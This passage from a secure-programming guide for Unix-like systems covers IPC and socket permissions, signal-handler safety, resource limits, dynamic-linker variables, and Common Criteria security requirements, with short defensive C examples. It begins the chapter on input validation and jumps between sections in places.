group with just themselves as members, so their defaults can permit the group to read and write any file
(since they’re the only member of the group). Thus, when the file’s group membership is transferred this
way, read and write privileges are transferred too. FSO basic access control values (read, write, execute)
are computed from (requested values & ~ umask of process). New files always start with a clear sticky
bit and clear setuid bit. For more information on POSIX ACLs, see acl(5).
• read and write permissions for each of creator, creator group, and others.
• creator UID and GID - UID and GID of the creator of the object.
• owning UID and GID - UID and GID of the owner of the object (initially equal to the creator UID).
Note that root, or a process with the EUID of either the owner or creator, can set the owning UID and
owning GID and/or remove the object. More information is available in ipc(5).
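As an illustrative sketch, these permission bits are supplied when the IPC object is created; for example, a shared memory segment readable and writable only by its creator:

    /* shm-create.c: create a System V shared memory segment with restrictive permissions (sketch). */
    #include <stdio.h>
    #include <sys/ipc.h>
    #include <sys/shm.h>

    int main(void) {
        /* 0600: read and write for the creator only; no group or other access. */
        int id = shmget(IPC_PRIVATE, 4096, IPC_CREAT | 0600);
        if (id < 0) { perror("shmget"); return 1; }
        printf("created shared memory segment id %d\n", id);

        /* Remove the segment again so this example does not leave objects behind. */
        if (shmctl(id, IPC_RMID, NULL) < 0) { perror("shmctl"); return 1; }
        return 0;
    }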
they are fairly similar to named pipes, but with significant advantages. In particular, Unix domain sockets
are connection-oriented; each new connection to the socket results in a new communication channel, a
very different situation than with named pipes. Because of this property, Unix domain sockets are often
used instead of named pipes to implement IPC for many important services. Just like you can have
unnamed pipes, you can have unnamed Unix domain sockets using socketpair(2); unnamed Unix domain
sockets are useful for IPC in a way similar to unnamed pipes.
There are several interesting security implications of Unix domain sockets. First, although Unix domain
sockets can appear in the filesystem and can have stat(2) applied to them, you can’t use open(2) to open
them (you have to use the socket(2) and friends interface). Second, Unix domain sockets can be used to
pass file descriptors between processes (not just the file’s contents). This odd capability, not available in
any other IPC mechanism, has been used to hack all sorts of schemes (the descriptors can basically be
used as a limited version of the “capability” in the computer science sense of the term). File descriptors
are sent using sendmsg(2), where the msg (message)’s field msg_control points to an array of control
message headers (field msg_controllen must specify the number of bytes contained in the array). Each
control message is a struct cmsghdr followed by data, and for this purpose you want the cmsg_type set to
SCM_RIGHTS. A file descriptor is retrieved through recvmsg(2) and then tracked down in the
analogous way. Frankly, this feature is quite baroque, but it’s worth knowing about.
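Here is a hedged sketch of the sending side of that dance; it assumes sock is a connected AF_UNIX socket (for example, one end of a socketpair(2)), and the helper name send_fd is mine, not a system call:

    /* send-fd.c: pass an open file descriptor over a Unix domain socket (hedged sketch). */
    #include <string.h>
    #include <sys/socket.h>
    #include <sys/uio.h>

    int send_fd(int sock, int fd_to_send) {
        struct msghdr msg;
        struct iovec iov;
        char dummy = 'x';                       /* must send at least one byte of data */
        char control[CMSG_SPACE(sizeof(int))];  /* room for one file descriptor */
        struct cmsghdr *cmsg;

        memset(&msg, 0, sizeof(msg));
        memset(control, 0, sizeof(control));

        iov.iov_base = &dummy;
        iov.iov_len = 1;
        msg.msg_iov = &iov;
        msg.msg_iovlen = 1;
        msg.msg_control = control;
        msg.msg_controllen = sizeof(control);

        cmsg = CMSG_FIRSTHDR(&msg);
        cmsg->cmsg_level = SOL_SOCKET;
        cmsg->cmsg_type = SCM_RIGHTS;           /* "I am passing access rights (an fd)" */
        cmsg->cmsg_len = CMSG_LEN(sizeof(int));
        memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

        return sendmsg(sock, &msg, 0) < 0 ? -1 : 0;
    }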
Linux 2.2 and later supports an additional feature in Unix domain sockets: you can acquire the peer’s
“credentials” (the pid, uid, and gid). Here’s some sample code:
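The following minimal sketch assumes sock is an already-connected Unix domain socket and uses the Linux-specific SO_PEERCRED option of getsockopt(2):

    #define _GNU_SOURCE            /* needed for struct ucred on glibc */
    #include <stdio.h>
    #include <sys/socket.h>

    /* peer_creds: print the peer's pid, uid, and gid (illustrative sketch).
     * "sock" is assumed to be a connected Unix domain (AF_UNIX) socket. */
    int peer_creds(int sock) {
        struct ucred cred;
        socklen_t len = sizeof(cred);

        if (getsockopt(sock, SOL_SOCKET, SO_PEERCRED, &cred, &len) != 0) {
            perror("getsockopt(SO_PEERCRED)");
            return -1;
        }
        printf("peer pid=%ld uid=%ld gid=%ld\n",
               (long) cred.pid, (long) cred.uid, (long) cred.gid);
        return 0;
    }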
Standard Unix convention is that binding to TCP and UDP local port numbers less than 1024 requires
root privilege, while any process can bind to an unbound port number of 1024 or greater. Linux follows
this convention; more specifically, Linux requires a process to have the capability
CAP_NET_BIND_SERVICE to bind to a port number less than 1024; this capability is normally only
held by processes with an EUID of 0. The adventurous can check this by examining the Linux
source; in Linux 2.2.12, it’s in the file /usr/src/linux/net/ipv4/af_inet.c, function inet_bind().
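As a hedged sketch, the convention is easy to observe from a program: an unprivileged process that tries to bind(2) to a port below 1024 typically gets EACCES (port 80 below is just an example):

    /* low-port.c: demonstrate that binding below port 1024 needs privilege (sketch). */
    #include <netinet/in.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>

    int main(void) {
        struct sockaddr_in addr;
        int sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock < 0) { perror("socket"); return 1; }

        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        addr.sin_port = htons(80);   /* a "privileged" port; needs CAP_NET_BIND_SERVICE */

        if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) != 0)
            perror("bind");          /* typically EACCES when run as a normal user */
        else
            puts("bind succeeded (running with sufficient privilege?)");

        close(sock);
        return 0;
    }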
3.5. Signals
Signals are a simple form of “interruption” in the Unix-like OS world, and are an ancient part of Unix. A
process can set a “signal” on another process (say using kill(1) or kill(2)), and that other process would
receive and handle the signal asynchronously. For a process to have permission to send an arbitrary
signal to some other process, the sending process must either have root privileges, or the real or effective
user ID of the sending process must equal the real or saved set-user-ID of the receiving process.
However, some signals can be sent in other ways. In particular, SIGURG can be delivered over a network
through the TCP/IP out-of-band (OOB) message.
Although signals are an ancient part of Unix, they’ve had different semantics in different
implementations. Basically, they involve questions such as “what happens when a signal occurs while
handling another signal”? The older Linux libc 5 used a different set of semantics for some signal
operations than the newer GNU libc libraries. Calling C library functions is often unsafe within a signal
handler, and even some system calls aren’t safe; you need to examine the documentation for each call
you make to see if it promises to be safe to call inside a signal. For more information, see the glibc FAQ
(on some systems a local copy is available at /usr/doc/glibc-*/FAQ).
For new programs, just use the POSIX signal system (which in turn was based on BSD work); this set is
widely supported and doesn’t have some of the problems that some of the older signal systems did. The
POSIX signal system is based on using the sigset_t datatype, which can be manipulated through a set of
operations: sigemptyset(), sigfillset(), sigaddset(), sigdelset(), and sigismember(). You can read about
these in sigsetops(3). Then use sigaction(2), sigprocmask(2), sigpending(2), and sigsuspend(2) to set up
and manipulate signal handling (see their man pages for more information).
In general, make any signal handlers very short and simple, and look carefully for race conditions.
Signals, since they are by nature asynchronous, can easily cause race conditions.
A common convention exists for servers: if you receive SIGHUP, you should close any log files, reopen
and reread configuration files, and then re-open the log files. This supports reconfiguration without
halting the server and log rotation without data loss. If you are writing a server where this convention
makes sense, please support it.
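As a hedged sketch combining the POSIX interface above with this convention, a server might handle SIGHUP like this (reopen_logs_and_config() is a hypothetical stand-in for the real work):

    /* sighup-demo.c: minimal SIGHUP handling pattern for a server (illustrative sketch). */
    #include <signal.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    static volatile sig_atomic_t got_sighup = 0;

    /* The handler only sets a flag; all real work happens in the main loop. */
    static void handle_sighup(int sig) {
        (void) sig;
        got_sighup = 1;
    }

    static void reopen_logs_and_config(void) {
        /* Hypothetical: close and reopen log files, reread configuration files. */
    }

    int main(void) {
        struct sigaction sa;
        memset(&sa, 0, sizeof(sa));
        sigemptyset(&sa.sa_mask);    /* block no additional signals in the handler */
        sa.sa_flags = SA_RESTART;
        sa.sa_handler = handle_sighup;
        if (sigaction(SIGHUP, &sa, NULL) != 0) { perror("sigaction"); return 1; }

        for (;;) {                   /* the server's main loop */
            if (got_sighup) {
                got_sighup = 0;
                reopen_logs_and_config();
            }
            sleep(1);                /* stand-in for the server's real work */
        }
    }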
Michal Zalewski [2001] has written an excellent tutorial on how signal handlers are exploited, and has
recommendations for how to eliminate signal race problems. I encourage looking at his summary for
more information; here are my recommendations, which are similar to Michal’s work:
• Where possible, have your signal handlers unconditionally set a specific flag and do nothing else.
• If you must have more complex signal handlers, use only calls specifically designated as being safe for
use in signal handlers. In particular, don’t use malloc() or free() in C (which on most systems aren’t
protected against signals), nor the many functions that depend on them (such as the printf() family and
syslog()). You could try to “wrap” calls to insecure library calls with a check to a global flag (to avoid
re-entry), but I wouldn’t recommend it.
• Block signal delivery during all non-atomic operations in the program, and block signal delivery
inside signal handlers.
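A hedged sketch of the last recommendation: block the relevant signal around a non-atomic update so that a handler can never observe the data half-modified (config_generation is a hypothetical piece of shared state):

    /* Block SIGHUP while updating shared state that a signal handler might inspect. */
    #include <signal.h>

    extern int config_generation;             /* hypothetical shared state */

    void update_config_generation(void) {
        sigset_t block, old;

        sigemptyset(&block);
        sigaddset(&block, SIGHUP);

        sigprocmask(SIG_BLOCK, &block, &old); /* delivery of SIGHUP is deferred */
        config_generation++;                  /* the non-atomic operation */
        sigprocmask(SIG_SETMASK, &old, NULL); /* restore the previous signal mask */
    }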
You can define storage (filesystem) quota limits on each mountpoint for the number of blocks of storage
and/or the number of unique files (inodes) that can be used, and you can set such limits for a given user
or a given group. A “hard” quota limit is a never-to-exceed limit, while a “soft” quota can be temporarily
exceeded. See quota(1), quotactl(2), and quotaon(8).
The rlimit mechanism supports a large number of process quotas, such as file size, number of child
processes, number of open files, and so on. There is a “soft” limit (also called the current limit) and a
“hard limit” (also called the upper limit). The soft limit cannot be exceeded at any time, but through calls
it can be raised up to the value of the hard limit. See getrlimit(2), setrlimit(2), getrusage(2),
sysconf(3), and ulimit(1). Note that there are several ways to set these limits, including the PAM module
pam_limits.
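As a hedged sketch, a process can query and tighten its own limits with getrlimit(2) and setrlimit(2); here the soft limit on open file descriptors is lowered (the value 64 is arbitrary):

    /* rlimit-demo.c: query and lower the soft limit on open file descriptors (sketch). */
    #include <stdio.h>
    #include <sys/resource.h>

    int main(void) {
        struct rlimit rl;

        if (getrlimit(RLIMIT_NOFILE, &rl) != 0) { perror("getrlimit"); return 1; }
        printf("open files: soft=%llu hard=%llu\n",
               (unsigned long long) rl.rlim_cur, (unsigned long long) rl.rlim_max);

        /* Lower the soft limit; an unprivileged process may not raise the hard limit. */
        if (rl.rlim_cur > 64)
            rl.rlim_cur = 64;
        if (setrlimit(RLIMIT_NOFILE, &rl) != 0) { perror("setrlimit"); return 1; }
        return 0;
    }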
Various environment variables can control this process, and in fact there are environment variables that
permit you to override this process (so, for example, you can temporarily substitute a different library for
this particular execution). In Linux, the environment variable LD_LIBRARY_PATH is a colon-separated
set of directories where libraries are searched for first, before the standard set of directories; this is useful
when debugging a new library or using a nonstandard library for special purposes, but be sure you trust
those who can control those directories. The variable LD_PRELOAD lists object files with functions that
override the standard set, just as /etc/ld.so.preload does. The variable LD_DEBUG displays debugging
information; if set to “all”, voluminous information about the dynamic linking process is displayed while
it’s occurring.
Permitting user control over dynamically linked libraries would be disastrous for setuid/setgid programs
if special measures weren’t taken. Therefore, in the GNU glibc implementation, if the program is setuid
or setgid these variables (and other similar variables) are ignored or greatly limited in what they can do.
The GNU glibc library determines if a program is setuid or setgid by checking the program’s credentials;
if the UID and EUID differ, or the GID and the EGID differ, the library presumes the program is
setuid/setgid (or descended from one) and therefore greatly limits its abilities to control linking. If you
load the GNU glibc libraries, you can see this; see especially the files elf/rtld.c and
sysdeps/generic/dl-sysdep.c. This means that if you cause the UID and GID to equal the EUID and
EGID, and then call a program, these variables will have full effect. Other Unix-like systems handle the
situation differently but for the same reason: a setuid/setgid program should not be unduly affected by
the environment variables set. Note that graphical user interface toolkits generally do permit user control
over dynamically linked libraries, because executables that directly invoke graphical user interface
toolkits should never, ever, be setuid (or have other special privileges) at all. For more about how to
develop secure GUI applications, see Section 7.4.4.
For Linux systems, you can get more information from my document, the Program Library HOWTO.
3.8. Audit
Different Unix-like systems handle auditing differently. In Linux, the most common “audit” mechanism
is syslogd(8), usually working in conjunction with klogd(8). You might also want to look at wtmp(5),
utmp(5), lastlog(8), and acct(2). Some server programs (such as the Apache web server) also have their
own audit trail mechanisms. According to the FHS, audit logs should be stored in /var/log or its
subdirectories.
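As a hedged sketch, a program adds its own entries to this audit trail through the syslog(3) interface (the identifier "myserver" and the message are just examples):

    /* syslog-demo.c: write an audit-style message via syslog(3) (illustrative sketch). */
    #include <syslog.h>

    int main(void) {
        /* "myserver" is just an example identifier; LOG_PID adds the process id. */
        openlog("myserver", LOG_PID, LOG_DAEMON);
        syslog(LOG_WARNING, "authentication failure for user %s", "example");
        closelog();
        return 0;
    }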
3.9. PAM
Sun Solaris and nearly all Linux systems use the Pluggable Authentication Modules (PAM) system for
authentication. PAM permits run-time configuration of authentication methods (e.g., use of passwords,
smart cards, etc.). See Section 11.6 for more information on using PAM.
3.10. Specialized Security Extensions for Unix-like Systems
A vast amount of research and development has gone into extending Unix-like systems to support
security needs of various communities. For example, several Unix-like systems have been extended to
support the U.S. military’s desire for multilevel security. If you’re developing software, you should try to
design your software so that it can work within these extensions.
FreeBSD has a new system call, jail(2). The jail system call supports sub-partitioning an environment
into many virtual machines (in a sense, a “super-chroot”); its most popular use has been to provide
virtual machine services for Internet Service Provider environments. Inside a jail, all processes (even
those owned by root) have the scope of their requests limited to the jail. When a FreeBSD system is booted up after a fresh install, no processes will be in jail. When a process is placed in a jail, it, and any descendants of that process created afterwards, will be in that jail. Once in a jail, access to the file name-space is
restricted in the style of chroot(2) (with typical chroot escape routes blocked), the ability to bind network
resources is limited to a specific IP address, the ability to manipulate system resources and perform
privileged operations is sharply curtailed, and the ability to interact with other processes is limited to
only processes inside the same jail. Note that each jail is bound to a single IP address; processes within
the jail may not make use of any other IP address for outgoing or incoming connections. More
information is available in the OnLamp.com article on FreeBSD Jails.
Some extensions available in Linux, such as POSIX capabilities and special mount-time options, have
already been discussed. Here are a few of these efforts for Linux systems for creating restricted execution
environments; there are many different approaches. Linux 2.6 adds the "Linux Security Module" (LSM)
interface, which allows administrators to plug in modules to perform more sophisticated access control
systems. The U.S. National Security Agency (NSA) has developed Security-Enhanced Linux (SELinux), based on the Flask security architecture, which supports defining a security policy in a specialized language and then enforces that
policy. Originally SELinux was developed as a separate set of patches, but it now works using LSM and
NSA has submitted the SELinux kernel module to the Linux developers for inclusion in the normal
kernel. The Medusa DS9 extends Linux by supporting, at the kernel level, a user-space authorization
server. LIDS protects files and processes, allowing administrators to “lock down” their system. The
“Rule Set Based Access Control” system, RSBAC is based on the Generalized Framework for Access
Control (GFAC) by Abrams and LaPadula and provides a flexible system of access control based on
several kernel modules. Subterfugue is a framework for “observing and playing with the reality of
software”; it can intercept system calls and change their parameters and/or change their return values to
implement sandboxes, tracers, and so on; it runs under Linux 2.4 with no changes (it doesn’t require any
kernel modifications). Janus is a security tool for sandboxing untrusted applications within a restricted
execution environment. Some have even used User-mode Linux, which implements “Linux on Linux”, as
a sandbox implementation. Because there are so many different approaches to implementing more
sophisticated security models, Linus Torvalds has requested that a generic approach be developed so
different security policies can be inserted; for more information about this, see
http://mail.wirex.com/mailman/listinfo/linux-security-module.
There are many other extensions for security on various Unix-like systems, but these are really outside
the scope of this document.
Chapter 4. Security Requirements
You will know that your tent is secure;
you will take stock of your property and
find nothing missing.
Job 5:24 (NIV)
Before you can determine if a program is secure, you need to determine exactly what its security
requirements are. Obviously, your specific requirements depend on the kind of system and data you
manage.
For example, any person or company doing business in the state of California is responsible for notifying
California residents when an unauthorized person acquires unencrypted computer data if that data
includes first name, last name, and at least one of the following: Social Security Number, driver’s license
number, account number, debit or credit card information. (Senate bill 1386 aka Civil Code 1798.82,
effective July 1, 2003).
Thankfully, there’s an international standard for identifying and defining security requirements that is
useful for many such circumstances: the Common Criteria [CC 1999], standardized as ISO/IEC
15408:1999. The CC is the culmination of decades of work to identify information technology security
requirements. There are other schemes for defining security requirements and evaluating products to see
if products meet the requirements, such as NIST FIPS-140 for cryptographic equipment, but these other
schemes are generally focused on a specialized area and won’t be considered further here.
This chapter briefly describes the Common Criteria (CC) and how to use its concepts to help you
informally identify security requirements and talk with others about security requirements using standard
terminology. The language of the CC is more precise, but it’s also more formal and harder to understand;
hopefully the text in this section will help you “get the gist”.
Note that, in some circumstances, software cannot be used unless it has undergone a CC evaluation by an
accredited laboratory. This includes certain kinds of uses in the U.S. Department of Defense (as specified
by NSTISSP Number 11, which requires that before some products can be used they must be evaluated
or enter evaluation), and in the future such a requirement may also include some kinds of uses for
software in the U.S. federal government. This section doesn’t provide enough information if you plan to
actually go through a CC evaluation by an accredited laboratory. If you plan to go through a formal
evaluation, you need to read the real CC, examine various websites to really understand the basics of the
CC, and eventually contract a lab accredited to do a CC evaluation.
Although the CC is International Standard ISO/IEC 15408:1999, it is outrageously expensive to order the
CC from ISO. Hopefully someday ISO will follow the lead of other standards organizations such as the
IETF and the W3C, which freely redistribute standards. Not surprisingly, IETF and W3C standards are
followed more often than many ISO standards, in part because ISO’s fees for standards simply make
them inaccessible to most developers. (I don’t mind authors being paid for their work, but ISO doesn’t
fund most of the standards development work - indeed, many of the developers of ISO documents are
volunteers - so ISO’s indefensible fees only line their own pockets and don’t actually aid the authors or
users at all.) Thankfully, the CC developers anticipated this problem and have made sure that the CC’s
technical content is freely available to all; you can download the CC’s technical content from
http://csrc.nist.gov/cc/ccv20/ccv2list.htm. Even those doing formal evaluation processes usually use these
editions of the CC, and not the ISO versions; there’s simply no good reason to pay ISO for them.
Although it can be used in other ways, the CC is typically used to create two kinds of documents, a
“Protection Profile” (PP) or a “Security Target” (ST). A “protection profile” (PP) is a document created
by a group of users (for example, a consumer group or large organization) that identifies the desired
security properties of a product. Basically, a PP is a list of user security requirements, described in a very
specific way defined by the CC. If you’re building a product similar to other existing products, it’s quite
possible that there are one or more PPs that define what some users believe are necessary for that kind of
product (e.g., an operating system or firewall). A “security target” (ST) is a document that identifies what
a product actually does, or a subset of it, that is security-relevant. An ST doesn’t need to meet the
requirements of any particular PP, but an ST could meet the requirements of one or more PPs.
Both PPs and STs can go through a formal evaluation. An evaluation of a PP simply ensures that the PP
meets various documentation rules and sanity checks. An ST evaluation involves not just examining the
ST document, but more importantly it involves evaluating an actual system (called the “target of
evaluation”, or TOE). The purpose of an ST evaluation is to ensure that, to the level of the assurance
requirements specified by the ST, the actual product (the TOE) meets the ST’s security functional
requirements. Customers can then compare evaluated STs to PPs describing what they want. Through
this comparison, consumers can determine if the products meet their requirements - and if not, where the
limitations are.
To create a PP or ST, you go through a process of identifying the security environment, namely, your
assumptions, threats, and relevant organizational security policies (if any). From the security
environment, you derive the security objectives for the product or product type. Finally, the security
requirements are selected so that they meet the objectives. There are two kinds of security requirements:
functional requirements (what a product has to be able to do), and assurance requirements (measures to
inspire confidence that the objectives have been met). Actually creating a PP or ST is often not a simple
straight line as outlined here, but the final result needs to show a clear relationship so that no critical
point is easily overlooked. Even if you don’t plan to write an ST or PP, the ideas in the CC can still be
helpful; the process of identifying the security environment, objectives, and requirements is still helpful
in identifying what’s really important.
The vast majority of the CC’s text is used to define standardized functional requirements and assurance
requirements. In essence, the majority of the CC is a “Chinese menu” of possible security requirements
that someone might want. PP authors pick from the various options to describe what they want, and ST
authors pick from the options to describe what they provide.
Since many people might have difficulty identifying a reasonable set of assurance requirements, pre-created sets of assurance requirements called “evaluation assurance levels” (EALs) have been
defined, ranging from 1 to 7. EAL 2 is simply a standard shorthand for the set of assurance requirements
defined for EAL 2. Products can add additional assurance measures, for example, they might choose
EAL 2 plus some additional assurance measures (if the combination isn’t enough to achieve a higher
EAL level, such a combination would be called "EAL 2 plus"). There are mutual recognition agreements
signed between many of the world’s nations that will accept an evaluation done by an accredited
laboratory in the other countries as long as all of the assurance measures taken were at the EAL 4 level or
less.
If you want to actually write an ST or PP, there’s an open source software program that can help you,
called the “CC Toolbox”. It can make sure that dependencies between requirements are met, suggest
common requirements, and help you quickly develop a document, but it obviously can’t do your thinking
for you. The specification of exactly what information must be in a PP or ST is in CC part 1, annexes B
and C respectively.
If you do decide to have your product (or PP) evaluated by an accredited laboratory, be prepared to spend
money, spend time, and work throughout the process. In particular, evaluations require paying an
accredited lab to do the evaluation, and higher levels of assurance become rapidly more expensive.
Simply believing your product is secure isn’t good enough; evaluators will require evidence to justify
any claims made. Thus, evaluations require documentation, and usually the available documentation has
to be improved or developed to meet CC requirements (especially at the higher assurance levels). Every
claim has to be justified to some level of confidence, so the more claims made, the stronger the claims,
and the more complicated the design, the more expensive an evaluation is. Obviously, when flaws are
found, they will usually need to be fixed. Note that a laboratory is paid to evaluate a product and
determine the truth. If the product doesn’t meet its claims, then you basically have two choices: fix the
product, or change (reduce) the claims.
It’s important to discuss with customers what’s desired before beginning a formal ST evaluation; an ST
that includes functional or assurance requirements not truly needed by customers will be unnecessarily
expensive to evaluate, and an ST that omits necessary requirements may not be acceptable to the
customers (because that necessary piece won’t have been evaluated). PPs identify such requirements, but
make sure that the PP accurately reflects the customer’s real requirements (perhaps the customer only
wants a part of the functionality or assurance in the PP, or has a different environment in mind, or wants
something else instead for the situations where your product will be used). Note that an ST need not
include every security feature in a product; an ST only states what will be (or has been) evaluated. A
product that has a higher EAL rating is not necessarily more secure than a similar product with a lower
rating or no rating; the environment might be different, the evaluation may have saved money and time
by not evaluating the other product at a higher level, or perhaps the evaluation missed something
important. Evaluations are not proofs; they simply impose a defined minimum bar to gain confidence in
the requirements or product.
threat agent (who might perform the attack?), a presumed attack method, any vulnerabilities that are the
basis for the attack, and what asset is under attack.
You’d then define a set of security objectives for the system and environment, and show that those
objectives counter the threats and satisfy the policies. Even if you aren’t creating a PP or ST, thinking
about your assumptions, threats, and possible policies can help you avoid foolish decisions. For example,
if the computer network you’re using can be sniffed (e.g., the Internet), then unencrypted passwords are a
foolish idea in most circumstances.
For the CC, you’d then identify the functional and assurance requirements that would be met by the
TOE, and which ones would be met by the environment, to meet those security objectives. These
requirements would be selected from the “Chinese menu” of the CC’s possible requirements, and the next
sections will briefly describe the major classes of requirements. In the CC, requirements are grouped into
classes, which are subdivided into families, which are further subdivided into components; the details of
all this are in the CC itself if you need to know about this. A good diagram showing how this works is in
the CC part 1, figure 4.5, which I cannot reproduce here.
Again, if you’re not intending for your product to undergo a CC evaluation, it’s still good to briefly
determine this kind of information and informally include that information in your documentation
(e.g., the man page or whatever your documentation is).
• Security Audit (FAU). Perhaps you’ll need to recognize, record, store, and analyze security-relevant
activities. You’ll need to identify what you want to make auditable, since often you can’t leave all
possible auditing capabilities enabled. Also, consider what to do when there’s no room left for auditing
- if you stop the system, an attacker may intentionally do things to be logged and thus stop the system.
• Communication/Non-repudiation (FCO). This class is poorly named in the CC; officially it’s called
communication, but the real meaning is non-repudiation. Is it important that an originator cannot deny
having sent a message, or that a recipient cannot deny having received it? There are limits to how well
technology itself can support non-repudiation (e.g., a user might be able to give their private key away
ahead of time if they wanted to be able to repudiate something later), but nevertheless for some
applications supporting non-repudiation capabilities is very useful.
• Cryptographic Support (FCS). If you’re using cryptography, what operations use cryptography, what
algorithms and key sizes are you using, and how are you managing their keys (including distribution
and destruction)?
• User Data Protection (FDP). This class specifies requirements for protecting user data, and is a big
class in the CC with many families inside it. The basic idea is that you should specify a policy for data
(access control or information flow rules), develop various means to implement the policy, possibly
support off-line storage, import, and export, and provide integrity when transferring user data between
TOEs. One often-forgotten issue is residual information protection - is it acceptable if an attacker can
later recover “deleted” data?
• Identification and authentication (FIA). Generally you don’t just want a user to report who they are
(identification) - you need to verify their identity, a process called authentication. Passwords are the
most common mechanism for authentication. It’s often useful to limit the number of authentication
attempts (if you can) and limit the feedback during authentication (e.g., displaying asterisks instead of
the actual password). Certainly, limit what a user can do before authenticating; in many cases, don’t let
the user do anything without authenticating. There may be many issues controlling when a session can
start, but in the CC world this is handled by the "TOE access" (FTA) class described below instead.
• Security Management (FMT). Many systems will require some sort of management (e.g., to control
who can do what), generally by those who are given a more trusted role (e.g., administrator). Be sure
you think through what those special operations are, and ensure that only those with the trusted roles
can invoke them. You want to limit trust; ideally, even more trusted roles should be limited in what
they can do.
• Privacy (FPR). Do you need to support anonymity, pseudonymity, unlinkability, or unobservability? If
so, are there conditions where you want or don’t want these (e.g., should an administrator be able to
determine the real identity of someone hiding behind a pseudonym?). Note that these can seriously
conflict with non-repudiation, if you want those too. If you’re worried about sophisticated threats,
these functions can be hard to provide.
• Protection of the TOE Security Functions/Self-protection (FPT). Clearly, if the TOE can be subverted,
any security functions it provides aren’t worthwhile, and in many cases a TOE has to provide at least
some self-protection. Perhaps you should "test the underlying abstract machine" - i.e., test that the
underlying components meet your assumptions, or have the product run self-tests (say during start-up,
periodically, or on request). You should probably "fail secure", at least under certain conditions;
determine what those conditions are. Consider physical protection of the TOE. You may want some
sort of secure recovery function after a failure. It’s often useful to have replay detection (detect when
an attacker is trying to replay older actions) and counter it. Usually a TOE must make sure that any
access checks are always invoked and actually succeed before performing a restricted action.
• Resource Utilization (FRU). Perhaps you need to provide fault tolerance, a priority of service scheme,
or support resource allocation (such as a quota system).
• TOE Access (FTA). There may be many issues controlling sessions. Perhaps there should be a limit on
the number of concurrent sessions (if you’re running a web service, would it make sense for the same
user to be logged in simultaneously, or from two different machines?). Perhaps you should lock or
terminate a session automatically (e.g., after a timeout), or let users initiate a session lock. You might
want to include a standard warning banner. One surprisingly useful piece of information is displaying,
on login, information about the last session (e.g., the date/time and location of the last login) and the
date/time of the last unsuccessful attempt - this gives users information that can help them detect
interlopers. Perhaps sessions can only be established based on other criteria (e.g., perhaps you can
only use the program during business hours).
• Trusted path/channels (FTP). A common trick used by attackers is to make the screen appear to be
something it isn’t, e.g., run an ordinary program that looks like a login screen or a forged web site.
Thus, perhaps there needs to be a "trusted path" - a way that users can ensure that they are talking to
the "real" program.
• Configuration management (ACM). At least, have a unique version identifier for each TOE release, so
that users will know what they have. You gain more assurance if you have good automated tools to
control your software, and have separate version identifiers for each piece (typical CM tools like CVS
can do this, although CVS doesn’t record changes as atomic change sets, which is one of its weaknesses). The
more that’s under configuration management, the better; don’t just control your code, but also control
documentation, track all problem reports (especially security-related ones), and all development tools.
• Delivery and operation (ADO). Your delivery mechanism should ideally let users detect unauthorized
modifications to prevent someone else masquerading as the developer, and even better, prevent
modification in the first place. You should provide documentation on how to securely install, generate,
and start-up the TOE, possibly generating a log describing how the TOE was generated.
• Development (ADV). These CC requirements deal with documentation describing the TOE
implementation, and require that these descriptions be consistent with each other (e.g., the information in the
ST, functional specification, high-level design, low-level design, and code, as well as any models of
the security policy).
• Guidance documents (AGD). Users and administrators of your product will probably need some sort
of guidance to help them use it correctly. It doesn’t need to be on paper; on-line help and "wizards"
can help too. The guidance should include warnings about actions that may be a problem in a secure
environment, and describe how to use the system securely.
• Life-cycle support (ALC). This includes development security (securing the systems being used for
development, including physical security), a flaw remediation process (to track and correct all security
flaws), and selecting development tools wisely.
• Tests (ATE). Simply testing can help, but remember that you need to test the security functions and not
just general functions. You should check that if something is set to be permitted, it is in fact permitted, and that if it is set to be forbidden, it is in fact not permitted. Of course, there may be clever ways to subvert this, which is what
vulnerability assessment is all about (described next).
• Vulnerability Assessment (AVA). Doing a vulnerability analysis is useful, where someone pretends to
be an attacker and tries to find vulnerabilities in the product using the available information, including
documentation (look for "don’t do X" statements and see if an attacker could exploit them) and
publicly known past vulnerabilities of this or similar products. The rest of this book describes various ways of countering known vulnerabilities of previous products, such as replay attacks (where known-good information is stored and retransmitted), buffer overflow attacks, race conditions, and other issues. The user and administrator guidance documents should be examined to ensure that misleading, unreasonable, or conflicting guidance is removed, and that security procedures for all modes of operation have been addressed. Specialized systems may need
to worry about covert channels; read the CC if you wish to learn more about covert channels.
• Maintenance of assurance (AMA). If you’re not going through a CC evaluation, you don’t need a
formal AMA process, but all software undergoes change. What is your process to give all your users
strong confidence that future changes to your software will not create new vulnerabilities? For
example, you could establish a process where multiple people review any proposed changes.
Chapter 5. Validate All Input
Wisdom will save you from the ways of
wicked men, from men whose words are
perverse...
Proverbs 2:12 (NIV)
Some inputs are from untrustable users, so those inputs must be validated (filtered) before being used.
We will first discuss the basics of input validation. This is followed by subsections that discuss different
kinds of inputs to a program; note that input includes process state such as environment variables, umask
values, and so on. Not all inputs are under the control of an untrusted user, so you need only worry about
those inputs that are.
• For strings, identify the legal characters or legal patterns (e.g., as a regular expression) and reject
anything not matching that form. There are special problems when strings contain control characters
(especially linefeed or NIL) or metacharacters (especially shell metacharacters); it is often best to
“escape” such metacharacters immediately when the input is received so that such characters are not
accidentally sent. CERT goes further and recommends escaping all characters that aren’t in a list of
characters not needing escaping [CERT 1998, CMU 1998]. See Section 8.3 for more information on
metacharacters. Note that line ending encodings vary on different computers: Unix-based systems use
character 0x0a (linefeed), CP/M and DOS based systems (including Windows) use 0x0d 0x0a
(carriage-return linefeed, and some programs incorrectly reverse the order), the Apple MacOS uses
0x0d (carriage return), and IBM OS/390 uses 0x85 (next line, sometimes called NEL). A small C sketch of this whitelisting approach appears after this list.
• Limit all numbers to the minimum (often zero) and maximum allowed values.
• A full email address checker is actually quite complicated, because there are legacy formats that
greatly complicate validation if you need to support all of them; see mailaddr(7) and IETF RFC 822
[RFC 822] for more information if such checking is necessary. Friedl [1997] developed a regular
expression to check if an email address is valid (according to the specification); his “short” regular
expression is 4,724 characters, and his “optimized” expression (in appendix B) is 6,598 characters
long. And even that regular expression isn’t perfect; it can’t recognize local email addresses, and it
can’t handle nested parentheses in comments (as the specification permits). Often you can simplify
and only permit the “common” Internet address formats.
